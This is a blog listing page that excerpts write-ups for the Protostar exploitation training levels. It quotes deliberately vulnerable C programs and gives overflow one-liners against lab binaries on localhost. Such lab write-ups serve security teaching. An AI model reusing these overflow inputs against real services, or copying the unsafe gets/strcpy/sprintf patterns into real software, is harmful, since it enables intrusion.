Posts List

Protostar Final0-3 write-ups

Final0 The application is expecting a username and then returns it in Upper case $ nc localhost 2995 alvaro No such user ALVARO The buffer is 512 bytes long but we need to look for the EIP overwrite offset since the compiler can change the buffer size to align it or other nasty reasons. We start trying to segfault the program till we get it with: echo `python -c 'print "A"*532 + "DDDD"'` | nc localhost 2995 We can verify it with gdb and the core dump:

Protostar net0-3 write-ups

Net 0 In this level we are presented with an integer and we have to reply the server with a little endian version of the integer. We use python and the struct module to do the conversion for us: from socket import * from struct import * s = socket(AF_INET, SOCK_STREAM) s.connect(("localhost", 2999)) challange = s.recv(1024) start = challange.find("'") + 1 end = challange.find("'", start) num = int(challange[start:end]) print "Challange: " + str(num) li = pack("<I", num) s.

Protostar heap0-4 write-ups

Heap0 In Heap0 we are given the following vulnerable code: #include <stdlib.h> #include <unistd.h> #include <string.h> #include <stdio.h> #include <sys/types.h> struct data { char name[64]; }; struct fp { int (*fp)(); }; void winner() { printf("level passed\n"); } void nowinner() { printf("level has not been passed\n"); } int main(int argc, char **argv) { struct data *d; struct fp *f; d = malloc(sizeof(struct data)); f = malloc(sizeof(struct fp)); f->fp = nowinner; printf("data is at %p, fp is at %p\n", d, f); strcpy(d->name, argv[1]); f->fp(); } From a quick peek to the source code, we can see that our first argument can overflow the d->name buffer (64bytes) and so overwrite the f->fp pointer.

Protostar format0-4 write-ups

Format0 In Format0 we are given the following vulnerable code: #include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h> void vuln(char *string) { volatile int target; char buffer[64]; target = 0; sprintf(buffer, string); if(target == 0xdeadbeef) { printf("you have hit the target correctly :)\n"); } } int main(int argc, char **argv) { vuln(argv[1]); } This is not really a format string vulnerability, our argument is going to be written in buffer with no size checks and buffer is just above target so we can overwrite it:

Protostar stack0-7 write-up

Stack0 In Stack0 we need to exploit the following program: #include <stdlib.h> #include <unistd.h> #include <stdio.h> int main(int argc, char **argv) { volatile int modified; char buffer[64]; modified = 0; gets(buffer); if(modified != 0) { printf("you have changed the 'modified' variable\n"); } else { printf("Try again?\n"); } } Since modified variable is between saved EBP and buffer any character overflowing buffer will change modified: user@protostar:~$ echo `python -c 'print("A"*64)'` | /opt/protostar/bin/stack0 Try again?